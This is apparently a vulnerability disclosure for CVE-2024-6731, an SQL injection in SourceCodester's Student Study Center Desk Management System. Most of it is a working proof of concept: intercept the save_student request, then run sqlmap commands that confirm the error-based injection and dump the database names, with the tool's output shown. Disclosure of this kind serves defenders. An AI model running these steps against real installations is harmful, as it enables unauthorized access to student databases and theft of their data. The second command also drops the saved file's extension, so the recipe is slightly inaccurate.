Skip to main content

CVE-2024-6731

 

Details

Attack type: SQL injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vendor: SourceCodester

Product: Student Study Center Desk Management System

Affected components: /sscdms/classes/Master.php?f=save_student

Injection parameter: MULTIPART id

 

POC

1

Intercept request using Burpsuite Proxy.

2

Save the request to save_student.txt.

The vulnerability can be verified with the following command:

sqlmap -r save_student.txt --batch

53

Parameter: MULTIPART id ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: -----------------------------250939851917583644163997292923
Content-Disposition: form-data; name="id"

Databases; can be dumped with the following command:

sqlmap -r save_student --batch --dbs

54

[10:03:23] [INFO] fetching database names
[10:03:23] [INFO] retrieved: 'information_schema'
[10:03:24] [INFO] retrieved: 'sscdms'
available databases [2]:
[*] information_schema
[*] sscdms